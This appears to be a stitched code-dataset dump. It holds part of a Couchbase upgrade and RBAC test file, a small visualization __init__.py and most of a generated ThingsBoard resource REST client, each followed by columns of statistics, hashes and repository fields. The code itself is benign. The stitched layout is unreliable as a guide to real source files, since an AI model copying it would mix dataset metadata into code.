        self.log.error(actual_result['metrics']['resultCount'])
        # verify number of users after upgrade
        self.assertTrue(actual_result['metrics']['resultCount'] == 20)
        self.shell = RemoteMachineShellConnection(self.master)
        self.create_users(users=[{'id': 'johnClusterAdmin',
                                  'name': 'john',
                                  'password': 'password'}])
        self.query = "GRANT {0} to {1}".format("cluster_admin", 'johnClusterAdmin')
        actual_result = self.run_cbq_query(query=self.query)
        self.assertTrue(actual_result['status'] == 'success')
        self.create_users(users=[{'id': 'john_admin',
                                  'name': 'john_admin',
                                  'password': 'password'}])
        self.query = "GRANT {0} to {1}".format("cluster_admin", 'john_admin')
        actual_result = self.run_cbq_query(query=self.query)
        self.assertTrue(actual_result['status'] == 'success')
        for query_bucket in self.query_buckets:
            cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where meta().id > 0 " \
                  "LIMIT 10'". \
                format('johnClusterAdmin', 'password', self.master.ip, query_bucket, self.curl_path)
            self.sleep(10)
            output, error = self.shell.execute_command(cmd)
            self.shell.log_command_output(output, error)
            self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
                            format(query_bucket, 'johnClusterAdmin'))
            # use pre-upgrade users
            cmd = "{4} -u {0}:{1} http://{2}:8093/query/service -d 'statement=SELECT * from {3} use index(idx) where meta().id > 0 " \
                  "LIMIT 10'". \
                format('john_admin', 'password', self.master.ip, query_bucket, self.curl_path)
            output, error = self.shell.execute_command(cmd)
            self.shell.log_command_output(output, error)
            self.assertTrue(any("success" in line for line in output), "Unable to select from {0} as user {1}".
                            format(query_bucket, 'john_admin'))
    def test_online_upgrade_with_rebalance_with_system_catalog(self):
        """
        This test does online upgrade and checks various system catalog users
        It might fail based on implementation details from dev.
        :return:
        """
        self._perform_online_upgrade_with_rebalance()
        self.create_and_verify_system_catalog_users_helper()
        self.check_system_catalog_helper()
    def test_online_upgrade_with_rebalance_check_ldap_users_before_upgrade(self):
        """
        This test does online upgrade and tests if users created before upgrade are working correctly after upgrade.
        The users created before upgrade are verified for functionality in verify_pre_upgrade_users_permissions_helper.
        Permissions for the users created before upgrade are changed after upgrade to new query based permissions in
        change_pre_upgrade_users_permissions.
        """
        for query_bucket in self.query_buckets:
            self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
            self.run_cbq_query(query=self.query)
        # create ldap users before upgrade
        self.create_ldap_auth_helper()
        self.sleep(20)
        self._perform_online_upgrade_with_rebalance()
        self.sleep(20)
        for query_bucket in self.query_buckets:
            self.query = 'create primary index on {0}'.format(query_bucket)
            self.run_cbq_query(query=self.query)
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
        self.assertEqual(actual_result['metrics']['resultCount'], 7,
                         "actual result is {0}".format(actual_result))
        self.verify_pre_upgrade_users_permissions_helper(test='online_upgrade')
        self.query_select_insert_update_delete_helper()
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
        self.assertEqual(actual_result['metrics']['resultCount'], 14,
                         "actual result is {0}".format(actual_result))
    def test_online_upgrade_with_failover_with_rbac(self):
        """
        # This test does the online upgrade ,validates the specific
        # permissions after upgrade and verifies the number of users created are correct.
        # It also verifies the queries use the correct index for sasl buckets after online upgrade.
        """
        # create users before upgrade via couchbase-cli
        self.create_users_before_upgrade_non_ldap()
        self._perform_online_upgrade_with_failover()
        self.sleep(20)
        # verify number of buckets after upgrade
        self.assertTrue(len(self.buckets) == 2)
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
        self.assertEqual(actual_result['metrics']['resultCount'], 23,
                         "actual result is {0}".format(actual_result))
        self.query_select_insert_update_delete_helper()
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
        self.assertEqual(actual_result['metrics']['resultCount'], 23,
                         "actual result is {0}".format(actual_result))
        self.check_permissions_helper()
        self.change_permissions_and_verify_new_users()
    def test_online_upgrade_with_failover_with_system_catalog(self):
        """
        This test does online upgrade and checks various system catalog users
        It might fail based on implementation details from dev.
        :return:
        """
        for query_bucket in self.query_buckets:
            self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
            self.run_cbq_query(query=self.query, server=self.n1ql_node)
        # NOTE(review): despite the test name, this performs the *rebalance*
        # online upgrade, not the failover one — confirm this is intentional.
        self._perform_online_upgrade_with_rebalance()
        self.sleep(20)
        self.create_and_verify_system_catalog_users_helper()
        self.check_system_catalog_helper()
    def test_online_upgrade_with_failover_check_ldap_users_before_upgrade(self):
        """
        This test does online upgrade and tests if users created before upgrade are working correctly after upgrade.
        The users created before upgrade are verified for functionality in verify_pre_upgrade_users_permissions_helper.
        Permissions for the users created before upgrade are changed after upgrade to new query based permissions in
        change_pre_upgrade_users_permissions.
        """
        for query_bucket in self.query_buckets:
            self.query = 'create index idx on {0}(meta().id)'.format(query_bucket)
            self.run_cbq_query(query=self.query)
        # create ldap users before upgrade
        self.create_ldap_auth_helper()
        self._perform_online_upgrade_with_failover()
        self.sleep(20)
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query, server=self.n1ql_node)
        self.assertEqual(actual_result['metrics']['resultCount'], 23)
        self.change_and_verify_pre_upgrade_ldap_users_permissions()
        self.query_select_insert_update_delete_helper()
        self.query = 'select * from system:user_info'
        actual_result = self.run_cbq_query(query=self.query)
        self.assertEqual(actual_result['metrics']['resultCount'], 23)
        self.check_permissions_helper()
        self.change_permissions_and_verify_new_users()
| 57.029412
| 134
| 0.651934
| 2,407
| 19,390
| 5.025758
| 0.089738
| 0.059519
| 0.033562
| 0.037034
| 0.859965
| 0.830867
| 0.80119
| 0.769364
| 0.758618
| 0.739688
| 0
| 0.013832
| 0.246828
| 19,390
| 339
| 135
| 57.19764
| 0.814503
| 0.159876
| 0
| 0.702811
| 0
| 0.028112
| 0.189925
| 0
| 0
| 0
| 0
| 0
| 0.120482
| 1
| 0.048193
| false
| 0.048193
| 0.024096
| 0
| 0.076305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fbd7c5e6201afffc1fd5e6e07beb71a9a0b04636
| 223
|
py
|
Python
|
src/visualization/__init__.py
|
ri-heme/02456
|
9d25d256eb836b86bbfb323b0851c74ced7b55ee
|
[
"FTL"
] | 1
|
2022-01-17T14:12:39.000Z
|
2022-01-17T14:12:39.000Z
|
src/visualization/__init__.py
|
ri-heme/02456
|
9d25d256eb836b86bbfb323b0851c74ced7b55ee
|
[
"FTL"
] | null | null | null |
src/visualization/__init__.py
|
ri-heme/02456
|
9d25d256eb836b86bbfb323b0851c74ced7b55ee
|
[
"FTL"
] | null | null | null |
from src.visualization.metrics import plot_grid, plot_metrics
from src.visualization.projection import generate_projection, plot_projection

# Public API of the visualization package.
__all__ = ["generate_projection", "plot_grid", "plot_metrics", "plot_projection"]
| 44.6
| 81
| 0.834081
| 27
| 223
| 6.444444
| 0.37037
| 0.206897
| 0.137931
| 0.218391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076233
| 223
| 4
| 82
| 55.75
| 0.84466
| 0
| 0
| 0
| 1
| 0
| 0.246637
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
83c06b5de4c18f3265ff29d3b8ef7a30806c0d6e
| 41,250
|
py
|
Python
|
tb_rest_client/api/api_ce/tb_resource_controller_api.py
|
samson0v/python_tb_rest_client
|
08ff7898740f7cec2170e85d5c3c89e222e967f7
|
[
"Apache-2.0"
] | 30
|
2020-06-19T06:42:50.000Z
|
2021-08-23T21:16:36.000Z
|
tb_rest_client/api/api_ce/tb_resource_controller_api.py
|
samson0v/python_tb_rest_client
|
08ff7898740f7cec2170e85d5c3c89e222e967f7
|
[
"Apache-2.0"
] | 25
|
2021-08-30T01:17:27.000Z
|
2022-03-16T14:10:14.000Z
|
tb_rest_client/api/api_ce/tb_resource_controller_api.py
|
samson0v/python_tb_rest_client
|
08ff7898740f7cec2170e85d5c3c89e222e967f7
|
[
"Apache-2.0"
] | 23
|
2020-07-06T13:41:54.000Z
|
2021-08-23T21:04:50.000Z
|
# coding: utf-8
"""
ThingsBoard REST API
ThingsBoard open-source IoT platform REST API documentation. # noqa: E501
OpenAPI spec version: 3.3.3-SNAPSHOT
Contact: info@thingsboard.io
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class TbResourceControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def delete_resource_using_delete1(self, resource_id, **kwargs): # noqa: E501
"""Delete Resource (deleteResource) # noqa: E501
Deletes the Resource. Referencing non-existing Resource Id will cause an error. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_resource_using_delete1(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_resource_using_delete1_with_http_info(resource_id, **kwargs) # noqa: E501
else:
(data) = self.delete_resource_using_delete1_with_http_info(resource_id, **kwargs) # noqa: E501
return data
    def delete_resource_using_delete1_with_http_info(self, resource_id, **kwargs):  # noqa: E501
        """Delete Resource (deleteResource)  # noqa: E501
        Deletes the Resource. Referencing non-existing Resource Id will cause an error. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_resource_using_delete1_with_http_info(resource_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
        :return: None
            If the method is called asynchronously,
            returns the request thread.
        """
        # Whitelist of keyword arguments this endpoint accepts.
        all_params = ['resource_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # NOTE: locals() snapshots the current local names ('self',
        # 'resource_id', 'kwargs'); the explicit kwargs are merged in below,
        # so the local variable names in this method are load-bearing.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_resource_using_delete1" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'resource_id' is set
        if ('resource_id' not in params or
                params['resource_id'] is None):
            raise ValueError("Missing the required parameter `resource_id` when calling `delete_resource_using_delete1`")  # noqa: E501
        collection_formats = {}
        # Path template substitution: {resourceId} in the URL below.
        path_params = {}
        if 'resource_id' in params:
            path_params['resourceId'] = params['resource_id']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501
        # Delegate the actual HTTP call (sync or async) to the shared ApiClient.
        return self.api_client.call_api(
            '/api/resource/{resourceId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def download_resource_using_get(self, resource_id, **kwargs): # noqa: E501
"""Download Resource (downloadResource) # noqa: E501
Download Resource based on the provided Resource Id. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.download_resource_using_get(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: Resource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.download_resource_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
else:
(data) = self.download_resource_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
return data
    def download_resource_using_get_with_http_info(self, resource_id, **kwargs):  # noqa: E501
        """Download Resource (downloadResource)  # noqa: E501
        Download Resource based on the provided Resource Id. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.download_resource_using_get_with_http_info(resource_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
        :return: Resource
            If the method is called asynchronously,
            returns the request thread.
        """
        # Whitelist of keyword arguments this endpoint accepts.
        all_params = ['resource_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # NOTE: locals() snapshots the current local names ('self',
        # 'resource_id', 'kwargs'); the explicit kwargs are merged in below,
        # so the local variable names in this method are load-bearing.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method download_resource_using_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'resource_id' is set
        if ('resource_id' not in params or
                params['resource_id'] is None):
            raise ValueError("Missing the required parameter `resource_id` when calling `download_resource_using_get`")  # noqa: E501
        collection_formats = {}
        # Path template substitution: {resourceId} in the URL below.
        path_params = {}
        if 'resource_id' in params:
            path_params['resourceId'] = params['resource_id']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501
        # Delegate the actual HTTP call (sync or async) to the shared ApiClient;
        # the response body is deserialized into a 'Resource' model.
        return self.api_client.call_api(
            '/api/resource/{resourceId}/download', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Resource',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_lwm2m_list_objects_page_using_get(self, page_size, page, **kwargs): # noqa: E501
"""Get LwM2M Objects (getLwm2mListObjectsPage) # noqa: E501
Returns a page of LwM2M objects parsed from Resources with type 'LWM2M_MODEL' owned by tenant or sysadmin. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. LwM2M Object is a object that includes information about the LwM2M model which can be used in transport configuration for the LwM2M device profile. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lwm2m_list_objects_page_using_get(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str text_search: The case insensitive 'startsWith' filter based on the resource title.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: list[LwM2mObject]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_lwm2m_list_objects_page_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_lwm2m_list_objects_page_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
return data
    def get_lwm2m_list_objects_page_using_get_with_http_info(self, page_size, page, **kwargs):  # noqa: E501
        """Get LwM2M Objects (getLwm2mListObjectsPage)  # noqa: E501
        Returns a page of LwM2M objects parsed from Resources with type 'LWM2M_MODEL' owned by tenant or sysadmin. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. LwM2M Object is a object that includes information about the LwM2M model which can be used in transport configuration for the LwM2M device profile. Available for users with 'TENANT_ADMIN' authority.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_lwm2m_list_objects_page_using_get_with_http_info(page_size, page, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int page_size: Maximum amount of entities in a one page (required)
        :param int page: Sequence number of page starting from 0 (required)
        :param str text_search: The case insensitive 'startsWith' filter based on the resource title.
        :param str sort_property: Property of entity to sort by
        :param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
        :return: list[LwM2mObject]
            If the method is called asynchronously,
            returns the request thread.
        """
        # Whitelist of keyword arguments this endpoint accepts.
        all_params = ['page_size', 'page', 'text_search', 'sort_property', 'sort_order']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # NOTE: locals() snapshots the current local names ('self', 'page_size',
        # 'page', 'kwargs'); the explicit kwargs are merged in below, so the
        # local variable names in this method are load-bearing.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_lwm2m_list_objects_page_using_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'page_size' is set
        if ('page_size' not in params or
                params['page_size'] is None):
            raise ValueError("Missing the required parameter `page_size` when calling `get_lwm2m_list_objects_page_using_get`")  # noqa: E501
        # verify the required parameter 'page' is set
        if ('page' not in params or
                params['page'] is None):
            raise ValueError("Missing the required parameter `page` when calling `get_lwm2m_list_objects_page_using_get`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        # Optional filters are only forwarded when the caller supplied them;
        # query parameter names use the server's camelCase convention.
        query_params = []
        if 'page_size' in params:
            query_params.append(('pageSize', params['page_size']))  # noqa: E501
        if 'page' in params:
            query_params.append(('page', params['page']))  # noqa: E501
        if 'text_search' in params:
            query_params.append(('textSearch', params['text_search']))  # noqa: E501
        if 'sort_property' in params:
            query_params.append(('sortProperty', params['sort_property']))  # noqa: E501
        if 'sort_order' in params:
            query_params.append(('sortOrder', params['sort_order']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501
        # Delegate the actual HTTP call (sync or async) to the shared ApiClient;
        # the response body is deserialized into list[LwM2mObject].
        return self.api_client.call_api(
            '/api/resource/lwm2m/page{?page,pageSize,sortOrder,sortProperty,textSearch}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[LwM2mObject]',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_lwm2m_list_objects_using_get(self, sort_order, sort_property, object_ids, **kwargs): # noqa: E501
"""Get LwM2M Objects (getLwm2mListObjects) # noqa: E501
Returns a page of LwM2M objects parsed from Resources with type 'LWM2M_MODEL' owned by tenant or sysadmin. You can specify parameters to filter the results. LwM2M Object is a object that includes information about the LwM2M model which can be used in transport configuration for the LwM2M device profile. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lwm2m_list_objects_using_get(sort_order, sort_property, object_ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING) (required)
:param str sort_property: Property of entity to sort by (required)
:param str object_ids: LwM2M Object ids. (required)
:return: list[LwM2mObject]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_lwm2m_list_objects_using_get_with_http_info(sort_order, sort_property, object_ids, **kwargs) # noqa: E501
else:
(data) = self.get_lwm2m_list_objects_using_get_with_http_info(sort_order, sort_property, object_ids, **kwargs) # noqa: E501
return data
def get_lwm2m_list_objects_using_get_with_http_info(self, sort_order, sort_property, object_ids, **kwargs): # noqa: E501
"""Get LwM2M Objects (getLwm2mListObjects) # noqa: E501
Returns a page of LwM2M objects parsed from Resources with type 'LWM2M_MODEL' owned by tenant or sysadmin. You can specify parameters to filter the results. LwM2M Object is a object that includes information about the LwM2M model which can be used in transport configuration for the LwM2M device profile. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_lwm2m_list_objects_using_get_with_http_info(sort_order, sort_property, object_ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING) (required)
:param str sort_property: Property of entity to sort by (required)
:param str object_ids: LwM2M Object ids. (required)
:return: list[LwM2mObject]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort_order', 'sort_property', 'object_ids'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_lwm2m_list_objects_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'sort_order' is set
if ('sort_order' not in params or
params['sort_order'] is None):
raise ValueError("Missing the required parameter `sort_order` when calling `get_lwm2m_list_objects_using_get`") # noqa: E501
# verify the required parameter 'sort_property' is set
if ('sort_property' not in params or
params['sort_property'] is None):
raise ValueError("Missing the required parameter `sort_property` when calling `get_lwm2m_list_objects_using_get`") # noqa: E501
# verify the required parameter 'object_ids' is set
if ('object_ids' not in params or
params['object_ids'] is None):
raise ValueError("Missing the required parameter `object_ids` when calling `get_lwm2m_list_objects_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort_order' in params:
query_params.append(('sortOrder', params['sort_order'])) # noqa: E501
if 'sort_property' in params:
query_params.append(('sortProperty', params['sort_property'])) # noqa: E501
if 'object_ids' in params:
query_params.append(('objectIds', params['object_ids'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource/lwm2m{?objectIds,sortOrder,sortProperty}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[LwM2mObject]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_resource_by_id_using_get(self, resource_id, **kwargs): # noqa: E501
"""Get Resource (getResourceById) # noqa: E501
Fetch the Resource object based on the provided Resource Id. Resource is a heavyweight object that includes main information about the Resource and also data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resource_by_id_using_get(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: TbResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_resource_by_id_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
else:
(data) = self.get_resource_by_id_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
return data
def get_resource_by_id_using_get_with_http_info(self, resource_id, **kwargs): # noqa: E501
"""Get Resource (getResourceById) # noqa: E501
Fetch the Resource object based on the provided Resource Id. Resource is a heavyweight object that includes main information about the Resource and also data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resource_by_id_using_get_with_http_info(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: TbResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['resource_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_resource_by_id_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'resource_id' is set
if ('resource_id' not in params or
params['resource_id'] is None):
raise ValueError("Missing the required parameter `resource_id` when calling `get_resource_by_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'resource_id' in params:
path_params['resourceId'] = params['resource_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource/{resourceId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TbResource', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_resource_info_by_id_using_get(self, resource_id, **kwargs): # noqa: E501
"""Get Resource Info (getResourceInfoById) # noqa: E501
Fetch the Resource Info object based on the provided Resource Id. Resource Info is a lightweight object that includes main information about the Resource excluding the heavyweight data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resource_info_by_id_using_get(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: TbResourceInfo
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_resource_info_by_id_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
else:
(data) = self.get_resource_info_by_id_using_get_with_http_info(resource_id, **kwargs) # noqa: E501
return data
def get_resource_info_by_id_using_get_with_http_info(self, resource_id, **kwargs): # noqa: E501
"""Get Resource Info (getResourceInfoById) # noqa: E501
Fetch the Resource Info object based on the provided Resource Id. Resource Info is a lightweight object that includes main information about the Resource excluding the heavyweight data. Available for users with 'SYS_ADMIN' or 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_resource_info_by_id_using_get_with_http_info(resource_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str resource_id: A string value representing the resource id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: TbResourceInfo
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['resource_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_resource_info_by_id_using_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'resource_id' is set
if ('resource_id' not in params or
params['resource_id'] is None):
raise ValueError("Missing the required parameter `resource_id` when calling `get_resource_info_by_id_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'resource_id' in params:
path_params['resourceId'] = params['resource_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/resource/info/{resourceId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='TbResourceInfo', # noqa: E501
auth_settings=auth_settings,
